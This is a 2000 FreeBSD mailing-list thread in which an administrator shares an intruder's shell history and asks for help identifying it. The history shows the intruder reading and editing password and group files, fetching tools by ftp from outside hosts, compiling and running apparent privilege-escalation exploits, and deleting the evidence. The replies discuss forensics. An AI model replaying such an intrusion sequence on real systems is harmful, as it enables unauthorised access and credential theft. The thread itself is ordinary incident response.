From owner-freebsd-questions Mon Dec 18 12:56:48 2000 From owner-freebsd-questions@FreeBSD.ORG Mon Dec 18 12:56:43 2000 Return-Path: Delivered-To: freebsd-questions@freebsd.org Received: from joe.pythonvideo.com (joe.pythonvideo.com [209.226.29.94]) by hub.freebsd.org (Postfix) with ESMTP id 9AB8437B402 for ; Mon, 18 Dec 2000 12:56:42 -0800 (PST) Received: from localhost (joe@localhost) by joe.pythonvideo.com (8.11.1/8.11.0) with ESMTP id eBIKuR207052; Mon, 18 Dec 2000 15:56:27 -0500 (EST) (envelope-from joe@advancewebhosting.com) X-Authentication-Warning: joe.pythonvideo.com: joe owned process doing -bs Date: Mon, 18 Dec 2000 15:56:27 -0500 (EST) From: Joe Oliveiro X-Sender: joe@joe.pythonvideo.com To: Alexander V P Cc: "Gerald T. Freymann" , Questions Subject: Re: Hacker history file - OUCH In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.ORG i like wiping the box! Microsoft: "Where would you like to go to today" Linux: "Where would you like to go tomorrow" FreeBSD: "Hey,when are you guys going to catch up" On Mon, 18 Dec 2000, Alexander V P wrote: > hi, > do you keep/have logs about what ftp transfers he did? > did you send mail to root@he.net, or .mx domain? > any idea how he break in? what freebsd you're using? > if i'm on your place, i'll unplug the box and try to find out more about > this. don't do like most of the sysadmins that just wipe the box. > alex > > On Mon, 18 Dec 2000, Gerald T. Freymann wrote: > > > > > > > Seems we have an intruder on one of our boxes... the .history file from the > > troubled account follows: > > > > cd bnc > > ls > > ./bash > > who > > cd /etc > > more passwd > > ps -l > > ls -l > > more pwd.db > > more hosts > > pico adduser.conf.bak > > pico group > > su user > > pico group.bak > > pico ftpuser > > O > > pico ftpusers > > su toor > > su operator > > id > > pico spwd.db > > su wheel > > pico passwd > > cd /var/tmp > > ls -a > > cd ... > > ls -a > > cd .. > > ls -l > > ls -al > > cd ... > > ftp copper.he.net > > chmod u+x xcon > > ./xcon > > id > > rm * > > ls > > who > > cd /var/tmp > > ls -a > > ls -al > > cd ... > > ls -a > > ftp cih.edu.mx > > ls > > cc bsd1 bsd-cron.c > > cc -o bsd1 bsd-cron.c > > ./bsd1 > > id > > cc -o bsd2 bsd2.c > > ./bsd2 > > id > > ls > > ftp cih.edu.mx > > ./bsd sh > > ./bsd.sh > > chmod u+x bsd.sh > > ./bsd.sh > > /tmp/sh > > id > > ls > > cc -o bsdsmail bsdsmail.c > > ./bsdsmail > > ls -a > > pico hack > > ls > > pico user.inf > > ls > > id > > rm * > > exit > > > > Anybody recognize what the intruder has set up? > > > > -Gerry > > > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-questions" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message